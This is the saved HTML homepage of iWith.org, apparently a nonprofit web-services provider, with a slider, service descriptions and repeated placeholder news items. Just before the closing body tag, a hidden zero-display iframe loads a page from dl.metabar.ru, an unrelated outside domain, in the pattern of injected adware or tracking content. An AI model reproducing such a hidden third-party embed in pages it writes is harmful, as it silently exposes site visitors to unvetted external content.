
<link href="/SiteEngine/Site/lib/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<link href="/SiteEngine/Site/lib/bootstrap/css/bootstrap-theme.min.css" rel="stylesheet">
<link href="/SiteEngine/Site/lib/jquery.bxslider/jquery.bxslider.css" rel="stylesheet">


<script src="/SiteEngine/Client/js/lib/jquery-1.11.3.js"></script>
<script src="/SiteEngine/Site/lib/jquery.bxslider/jquery.bxslider.js"></script>

<script type="text/javascript">

  $(document).ready(function() {

    $(".tdLanguage").click(function (event) {
      if ($("#languageMenu").css("display") === "block") {
      }      
      else
        $("#languageMenu").show();
    });

    $(window).mousedown(function () {
      $("#languageMenu").hide();
    });

    $('.dvSlider').bxSlider({
      slideWidth: screen.width,
      minSlides: 1,
      maxSlides: 1,
      //slideMargin: 10
    });
    $('.bx-viewport').css("left", "0px");


  });
</script>

<link href="/SiteEngine/Site/layouts/Iwith.org/mainLayout.css" rel="stylesheet">

<body style="
  padding: 0;
  margin: 0;
"><div>
  <div class="dvTop" style="
width: 100%;display: table;">

  <div class="dvTopInternal" style="
  display: table-cell;
  text-align: center;
  position: relative;
">

  <table style="
  margin: auto;
">
    <tbody><tr>
      <td>
        <div class="dvLogo" style="
            display: table-cell;
          ">
                <img src="/SiteEngine/Site/images/Logo_official.png" style="
            width: 125px;
            height: 155px;                                                            
          ">

              </div>      
      </td>
      <td style="
  vertical-align: top;
  height: 100%;
  padding-left: 100px;
">
                <table class="tbMiddle" style="
">
  <tbody><tr>
    <td>
              <div class="dvTitle" style="
              text-align: right;
              color: #EE8234;
              font-family: 'Titillium Web', sans-serif;
              text-rendering: optimizelegibility;
              font-size: 1.3em;
        ">
              <span>Internet for projects that improve the world *</span>
            </div>
    
    </td>
  </tr>
  <tr>
    <td>
              <table style="
  font-family: sans-serif;
  font-size: 21px;
  color: #006E75;
">
  <tbody><tr>
    <td>
      <div class="dvMenu"><ul>
                  <li>Home</li>
                  <li>Organisation</li>
                  <li>Services</li>
                  <li>News</li>
                </ul>

                </div>
    </td>
    <td style="
  padding-left: 60px;
">
  <div>
      <input class="inputSearch" type="text" placeholder="Search">

    </div>
</td>
<td class="tdLanguage">
  <div class="dvLanguageMenu">
    <div style="
  display: table-cell;
  padding-left: 15px;
">
  <span>language</span>
</div>

<div style="
  display: table-cell;
  vertical-align: middle;
  padding-left: 2px;
">
  <b class="caret"></b>
</div>

  <ul id="languageMenu" class="dropdown-menu" style="display: none;"><li><a href="/i-js/lang.php?l=es_ES&amp;r=1">Castellano</a></li>
                    <li><a href="/i-js/lang.php?l=ca_ES&amp;r=1">Català</a></li>
                    <li><a href="/i-js/lang.php?l=en_US&amp;r=1"> English </a></li>
                    <li><a href="/i-js/lang.php?l=fr_FR&amp;r=1"> Français</a></li>
            </ul>

  </div>  

</td>
  </tr>
</tbody></table>


            <div class="dvSearch"></div><div class="dvLanguage"></div>
    
    </td>

  </tr>
  
</tbody></table>

      
      
        
      </td>
    </tr>
  </tbody></table>
  

  
  
  </div>
  
  


  </div>


<div class="bx-wrapper" style="max-width: 1920px;"><div class="bx-viewport" style="width: 100%; overflow: hidden; position: relative; left: 0px; height: 260px;"><div class="dvSlider" style="width: 1015%; position: relative; transition-duration: 0s; transform: translate3d(-1831px, 0px, 0px);"><div class="slide bx-clone" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/formacion.jpg"></div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;">
      <div class="item">
	  <a href="/en/soluciones/comunidadesvirtuales.html"><img src="http://www.iwith.org/images_2013/slide/crowdfunding.jpg"></a>
	  <div class="container">
		  <div class="carousel-caption">
			  <h1>
				  Fundraising</h1>
			  <p class="lead">
				  We take your fundraising strategy online</p>
		  </div>
	  </div>
  </div>
    </div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/consultoriainternet.jpg"></div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/paginaswebresponsive.jpg"></div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/googlegrants.jpg"></div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/email.jpg"></div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/trabajoenred.jpg"></div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/redessociales.jpg"></div>
    <div class="slide" style="float: left; list-style: none; position: relative; width: 1831px;"><img src="http://www.iwith.org/images_2013/slide/formacion.jpg"></div>
  <div class="slide bx-clone" style="float: left; list-style: none; position: relative; width: 1831px;">
      <div class="item">
	  <a href="/en/soluciones/comunidadesvirtuales.html"><img src="http://www.iwith.org/images_2013/slide/crowdfunding.jpg"></a>
	  <div class="container">
		  <div class="carousel-caption">
			  <h1>
				  Fundraising</h1>
			  <p class="lead">
				  We take your fundraising strategy online</p>
		  </div>
	  </div>
  </div>
    </div></div></div><div class="bx-controls bx-has-pager bx-has-controls-direction"><div class="bx-pager bx-default-pager"><div class="bx-pager-item"><a href="" data-slide-index="0" class="bx-pager-link active">1</a></div><div class="bx-pager-item"><a href="" data-slide-index="1" class="bx-pager-link">2</a></div><div class="bx-pager-item"><a href="" data-slide-index="2" class="bx-pager-link">3</a></div><div class="bx-pager-item"><a href="" data-slide-index="3" class="bx-pager-link">4</a></div><div class="bx-pager-item"><a href="" data-slide-index="4" class="bx-pager-link">5</a></div><div class="bx-pager-item"><a href="" data-slide-index="5" class="bx-pager-link">6</a></div><div class="bx-pager-item"><a href="" data-slide-index="6" class="bx-pager-link">7</a></div><div class="bx-pager-item"><a href="" data-slide-index="7" class="bx-pager-link">8</a></div></div><div class="bx-controls-direction"><a class="bx-prev" href="">Prev</a><a class="bx-next" href="">Next</a></div></div></div>

  <div class="dvMiddle" style="
  text-align: center;
">
  <div class="dvLinkSection" style="
      /* height: 200px; */
      /* width: 100%; */
      display: inline-block;
    ">

        <table class="tbLinks" style="

  ">
        <tbody><tr>
          <td style="
  ">
      <div class="dvLinkImg">  
        <img src="/SiteEngine/Site/images/service1.png">
      </div>
    <div class="dvLinkTitle dvInternetSecurity">  
      <a href="">
        <span>Internet and Society</span>
      </a>
    </div>
  <div class="dvLinkInfo">
    <span>The Internet offers great opportunities for the improvement of society. In iWith.org we help to make the most of them connecting the two worlds with advice, training, technology and guidance.</span>
  </div>
    </td>
          <td style="
  ">
      <div class="dvLinkImg">  
        <img src="/SiteEngine/Site/images/service2.png">
      </div>
    <div class="dvLinkTitle dvInternetSecurity">  
      <a href="">
        <span>Web 2.0 Responsive</span>
      </a>
    </div>
  <div class="dvLinkInfo">
    <span>To help organizations take advantage of this opportunity, iWith.org gives the websites update responsive service for mobiles, including assessment, recommendations and proposals for improvement.</span>
  </div>
    </td>
          <td style="
  ">
      <div class="dvLinkImg">  
        <img src="/SiteEngine/Site/images/service3.png">
      </div>
    <div class="dvLinkTitle dvInternetSecurity">  
      <a href="">
        <span>Grant for Assessment</span>
      </a>
    </div>
  <div class="dvLinkInfo">
    <span>If you are a NGO, Association, Social Entrepreneu or Socially Responsible Company and you are working for a better world, request a grant for assessment and we help you.</span>
  </div>
    </td>
        </tr>
      </tbody></table>    


  <div class="dvNewsSection">
    <table>
      <tbody><tr>
        <td class="tdNews">
  <div class="dvHeader">
    <span>Our News</span>
  </div>
  <div class="dvNewsList">
    
<div class="dvNews">
  <table>    
    <tbody><tr>
      <td>
          <div class="dvImg" style="
      display: inline-block;
      padding-right: 15px;
    ">
            <img src="/SiteEngine/Site/images/news2.jpeg" style="
      width: 200px;
    ">
          </div>      
      </td>
      <td>
          <div class="dvNewsContent">
            <div class="dvTitle">
  <a href="">
  <span class="spTitle">iWith.org organizes and takes part in the II Social Innovation Forum</span>
</a>
</div><br>
    <div class="dvContent">
  <span class="spContent">Gallery and The Social Coin are two of the innovations that we introduced during the Speednetworking workshop. </span>
</div>

          </div>

      
      </td>
    </tr>
  </tbody></table>
      
    </div>
<div class="dvNews">
  <table>    
    <tbody><tr>
      <td>
          <div class="dvImg" style="
      display: inline-block;
      padding-right: 15px;
    ">
            <img src="/SiteEngine/Site/images/news2.jpeg" style="
      width: 200px;
    ">
          </div>      
      </td>
      <td>
          <div class="dvNewsContent">
            <div class="dvTitle">
  <a href="">
  <span class="spTitle">The Obertament Case: Standing Up For Mental Health via Internet</span>
</a>
</div><br>
    <div class="dvContent">
  <span class="spContent">Gallery and The Social Coin are two of the innovations that we introduced during the Speednetworking workshop. </span>
</div>

          </div>

      
      </td>
    </tr>
  </tbody></table>
      
    </div>
<div class="dvNews">
  <table>    
    <tbody><tr>
      <td>
          <div class="dvImg" style="
      display: inline-block;
      padding-right: 15px;
    ">
            <img src="/SiteEngine/Site/images/news2.jpeg" style="
      width: 200px;
    ">
          </div>      
      </td>
      <td>
          <div class="dvNewsContent">
            <div class="dvTitle">
  <a href="">
  <span class="spTitle">The Obertament Case: Standing Up For Mental Health via Internet</span>
</a>
</div><br>
    <div class="dvContent">
  <span class="spContent">Gallery and The Social Coin are two of the innovations that we introduced during the Speednetworking workshop. </span>
</div>

          </div>

      
      </td>
    </tr>
  </tbody></table>
      
    </div><div class="dvNews">
  <table>    
    <tbody><tr>
      <td>
          <div class="dvImg" style="
      display: inline-block;
      padding-right: 15px;
    ">
            <img src="/SiteEngine/Site/images/news2.jpeg" style="
      width: 200px;
    ">
          </div>      
      </td>
      <td>
          <div class="dvNewsContent">
            <div class="dvTitle">
  <a href="">
  <span class="spTitle">The Obertament Case: Standing Up For Mental Health via Internet</span>
</a>
</div><br>
    <div class="dvContent">
  <span class="spContent">Gallery and The Social Coin are two of the innovations that we introduced during the Speednetworking workshop. </span>
</div>

          </div>

      
      </td>
    </tr>
  </tbody></table>
      
    </div>
  </div>
</td>
        <td class="tdEvent">
  <div class="dvHeader">
    <span>Events</span>
  </div><div class="dvEventsList">
  <div class="dvEvent dvUpcomingEvents"><span>No upcoming events</span>
  
  </div>
<div class="dvEvent dvVideo">
  <span class="dvHeader">Video</span>
  <div class="dvListVideo">
  </div>
</div>
<div class="dvEvent dvOurBeneficiaries">
  <span class="dvHeader">Our Beneficiaries</span>
  
</div>
</div>
</td>
      </tr>
    </tbody></table>
  </div>  
  
    </div>
</div>






</div>
<iframe src="https://dl.metabar.ru/static/storage/index.html?version=201511131635" style="display: none;"></iframe></body>